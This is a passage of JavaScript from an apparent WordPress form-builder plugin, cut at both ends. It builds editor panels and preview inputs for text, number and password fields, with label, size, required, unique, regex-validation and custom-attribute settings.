			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
	}

		
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);
	
	edit_main_td10.appendChild(el_label_size_label);
	edit_main_td10_1.appendChild(el_label_size);

	edit_main_td11.appendChild(el_add_regExp_label);
	edit_main_td11_1.appendChild(el_add_regExp);
	
	edit_main_td12.appendChild(el_reg_value_label);
	edit_main_td12_1.appendChild(el_reg_value);
	
	edit_main_td13.appendChild(el_reg_com_val_label);
	edit_main_td13_1.appendChild(el_reg_com_val);
	
	edit_main_td14.appendChild(el_reg_arg_label);
	edit_main_td14_1.appendChild(el_reg_arg);
	
	edit_main_td15.appendChild(el_reg_alert_label);
	edit_main_td15_1.appendChild(el_reg_alert);
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	
	edit_main_td9.appendChild(el_style_label2);
	edit_main_td9_1.appendChild(el_style_textarea2);
	
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br2);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	
	edit_main_tr12.appendChild(edit_main_td12);
	edit_main_tr12.appendChild(edit_main_td12_1);
	
	edit_main_tr13.appendChild(edit_main_td13);
	edit_main_tr13.appendChild(edit_main_td13_1);
	
	edit_main_tr14.appendChild(edit_main_td14);
	edit_main_tr14.appendChild(edit_main_td14_1);
	
	edit_main_tr15.appendChild(edit_main_td15);
	edit_main_tr15.appendChild(edit_main_td15_1);
	
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr12);
	edit_main_table.appendChild(edit_main_tr13);
	edit_main_table.appendChild(edit_main_tr14);
	edit_main_table.appendChild(edit_main_tr15);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_text");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
		var adding = document.createElement(element);
            adding.setAttribute("type", type);
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			adding.setAttribute("onFocus", 'delete_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onBlur", 'return_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onChange", 'change_value("'+i+'_elementform_id_temp")');
			
		var adding_regExp_status = document.createElement("input");
			adding_regExp_status.setAttribute("type", "hidden");
			adding_regExp_status.setAttribute("value", w_regExp_status);
			adding_regExp_status.setAttribute("name", i+"_regExpStatusform_id_temp");
			adding_regExp_status.setAttribute("id", i+"_regExpStatusform_id_temp");
	
		var adding_regArg = document.createElement("input");
			adding_regArg.setAttribute("type", "hidden");
			adding_regArg.setAttribute("value", w_regExp_arg);
			adding_regArg.setAttribute("name", i+"_regArgumentform_id_temp");
			adding_regArg.setAttribute("id", i+"_regArgumentform_id_temp");
		
		var adding_regExp_common = document.createElement("input");
			adding_regExp_common.setAttribute("type", "hidden");
			adding_regExp_common.setAttribute("value", w_regExp_common);
			adding_regExp_common.setAttribute("name", i+"_regExp_commonform_id_temp");
			adding_regExp_common.setAttribute("id", i+"_regExp_commonform_id_temp");
		
		var adding_regExp_value = document.createElement("input");
			adding_regExp_value.setAttribute("type", "hidden");
			adding_regExp_value.setAttribute("value", escape(w_regExp_value));
			adding_regExp_value.setAttribute("name", i+"_regExp_valueform_id_temp");
			adding_regExp_value.setAttribute("id", i+"_regExp_valueform_id_temp");
						
		var adding_regExp_alert = document.createElement("input");
			adding_regExp_alert.setAttribute("type", "hidden");
			adding_regExp_alert.setAttribute("value", w_regExp_alert);
			adding_regExp_alert.setAttribute("name", i+"_regExp_alertform_id_temp");
			adding_regExp_alert.setAttribute("id", i+"_regExp_alertform_id_temp");	

     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width= w_field_label_size+'px';
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var br = document.createElement('br');
    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
		if(w_required=="yes")
			required.innerHTML = " *";
      	
		var main_td  = document.getElementById('show_table');
      
		div_label.appendChild(label);
		div_label.appendChild(required);
		div_element.appendChild(adding_type);
		div_element.appendChild(adding_required);
		div_element.appendChild(adding_regExp_status);
		div_element.appendChild(adding_regExp_value); 
		div_element.appendChild(adding_regExp_common); 
		div_element.appendChild(adding_regExp_alert);
		div_element.appendChild(adding_regArg); 
		div_element.appendChild(adding_unique);
		div_element.appendChild(adding);
		div_field.appendChild(div_label);
		div_field.appendChild(div_element);
	  
		div.appendChild(div_field);
		div.appendChild(br);
		main_td.appendChild(div);
		
		if(w_field_label_pos == "top")
			label_top(i);
			
		refresh_attr(i, 'type_text');
}

function set_regExpStatus(id)
{	
	jQuery('#edit_main_tr12, #edit_main_tr13, #edit_main_tr14, #edit_main_tr15').toggle(200);
	if(document.getElementById(id+"form_id_temp").value == "yes")
		document.getElementById(id+"form_id_temp").setAttribute("value", "no");
	else
		document.getElementById(id+"form_id_temp").setAttribute("value", "yes");
}

function set_regExpArgument(id)
{	
	if(document.getElementById(id+"form_id_temp").value.length <= 0)
		document.getElementById(id+"form_id_temp").setAttribute("value", "i");
	else
		document.getElementById(id+"form_id_temp").setAttribute("value", "");
}

function change_regExpValue(i, regValue, regVal_id, com_option)
{
	if(com_option.length > 0)
	{
		document.getElementById("regExp_value"+i).value = com_option;
		document.getElementById(regVal_id).value = com_option;
		document.getElementById(i+"_regExp_commonform_id_temp").value = document.getElementById("common_RegExp"+i).selectedIndex; 
	}
	else
	{
		document.getElementById(regVal_id).value = regValue;
		document.getElementById(i+"_regExp_commonform_id_temp").value = regValue;
	}	
}

function change_regExpAlert(regAlert,id)
{
	document.getElementById(id).value = regAlert;
}


function type_number(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_first_val, w_title, w_required, w_unique, w_class, w_attr_name, w_attr_value) {

    document.getElementById("element_type").value="type_number";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
			
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
		
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
	    el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	

	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";

	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
		el_label_left.innerHTML = "Left";	

	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");

	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
		el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos=="top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_elementform_id_temp', this.value)");

	var el_first_value_label = document.createElement('label');
		el_first_value_label.setAttribute("class", "fm-field-label");
		el_first_value_label.setAttribute("for", "el_first_value_input");
		el_first_value_label.innerHTML = "Value if empty ";
	
	var el_first_value_input = document.createElement('input');
        el_first_value_input.setAttribute("id", "el_first_value_input");
		el_first_value_input.setAttribute("type", "text");
		el_first_value_input.setAttribute("value", w_title);
		el_first_value_input.setAttribute("onKeyUp", "change_input_value(this.value,'"+i+"_elementform_id_temp');");
		
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
	    el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
		el_required.setAttribute("checked", "checked");
	
	var el_unique_label = document.createElement('label');
		el_unique_label.setAttribute("class", "fm-field-label");
	    el_unique_label.setAttribute("for", "el_unique");
		el_unique_label.innerHTML = "Allow only unique values";
	
	var el_unique = document.createElement('input');
		el_unique.setAttribute("id", "el_unique");
		el_unique.setAttribute("type", "checkbox");
		el_unique.setAttribute("onclick", "set_unique('"+i+"_uniqueform_id_temp')");
	if(w_unique=="yes")
        el_unique.setAttribute("checked", "checked");
							
	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
	    el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";

	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");
		el_attr_label.innerHTML = "Additional Attributes";
			
	var el_attr_add = document.createElement('img');
      	el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
        el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
        el_attr_add.setAttribute("title", 'add');
        el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_text')");
		
	var el_attr_table = document.createElement('table');
        el_attr_table.setAttribute("id", 'attributes');
        el_attr_table.setAttribute("border", '0');
        el_attr_table.style.cssText = 'margin-left:0px';
		
	var el_attr_tr_label = document.createElement('tr');
        el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
        el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
        el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
        el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	    el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
	var el_attr_value_label = document.createElement('label');
	    el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.setAttribute("class", "fm-field-choice");
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_text')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.setAttribute("class", "fm-field-choice");
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_text')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_text')");
	
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br6 = document.createElement('br');
	
	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td3.appendChild(el_size_label);
	edit_main_td3_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_first_value_label);
	edit_main_td4_1.appendChild(el_first_value_input);
	
	edit_main_td5.appendChild(el_style_label);
	edit_main_td5_1.appendChild(el_style_textarea);
	edit_main_td6.appendChild(el_required_label);
	edit_main_td6_1.appendChild(el_required);
				
	edit_main_td8.appendChild(el_unique_label);
	edit_main_td8_1.appendChild(el_unique);
	
	
	
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_text');
	
//show table

	element='input';	type='text'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_number");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	    
	var adding_required= document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
	var adding_unique= document.createElement("input");
            adding_unique.setAttribute("type", "hidden");
            adding_unique.setAttribute("value", w_unique);
            adding_unique.setAttribute("name", i+"_uniqueform_id_temp");
            adding_unique.setAttribute("id", i+"_uniqueform_id_temp");
			
			
	var adding = document.createElement(element);
			adding.setAttribute("type", type);
		
		if(w_title==w_first_val)
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_deactive");
		}
		else
		{
			adding.style.cssText = "width:"+w_size+"px;";
			adding.setAttribute("class", "input_active");
		}
			adding.setAttribute("id", i+"_elementform_id_temp");
			adding.setAttribute("name", i+"_elementform_id_temp");
			adding.setAttribute("value", w_first_val);
			adding.setAttribute("title", w_title);
			adding.setAttribute("onKeyPress", "return check_isnum(event)");
			adding.setAttribute("onFocus", 'delete_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onBlur", 'return_value("'+i+'_elementform_id_temp")');
			adding.setAttribute("onChange", 'change_value("'+i+'_elementform_id_temp")');
			
	 
     	var div = document.createElement('div');
      	    div.setAttribute("id", "main_div");
					
      	var div_field = document.createElement('div');
           	div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
      	var div_label = document.createElement('div');
         	div_label.setAttribute("align", 'left');
         	div_label.style.display="table-cell";
			div_label.style.width=w_field_label_size+"px";
           	div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var div_element = document.createElement('div');
         	div_element.setAttribute("align", 'left');
          	div_element.style.display="table-cell";
          	div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");
			label.style.verticalAlign="top";
	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
			required.style.verticalAlign="top";
	if(w_required=="yes")
			required.innerHTML = " *";
      	var main_td  = document.getElementById('show_table');
      
      	div_label.appendChild(label);
      	div_label.appendChild(required);
      	div_element.appendChild(adding_type);
      	div_element.appendChild(adding_required);
      	div_element.appendChild(adding_unique);
      	div_element.appendChild(adding);
      	div_field.appendChild(div_label);
      	div_field.appendChild(div_element);
      	
      
      	div.appendChild(div_field);
      	main_td.appendChild(div);
		
		if(w_field_label_pos=="top")
			label_top(i);
			
		change_class(w_class, i);
		refresh_attr(i, 'type_text');
}

function type_password(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_required, w_unique, w_class, w_attr_name, w_attr_value) {

    document.getElementById("element_type").value="type_password";
	delete_last_child();

	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr3  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td3 = document.createElement('td');
	var edit_main_td3_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');

	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
        el_label_textarea.setAttribute("id", "edit_for_label");
        el_label_textarea.setAttribute("rows", "4");
        
        el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
		
		
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";	
		
	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");
	
	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("class", "fm-field-label");
	    el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.innerHTML = "Field size(px) ";
	
	var el_size = document.createElement('input');
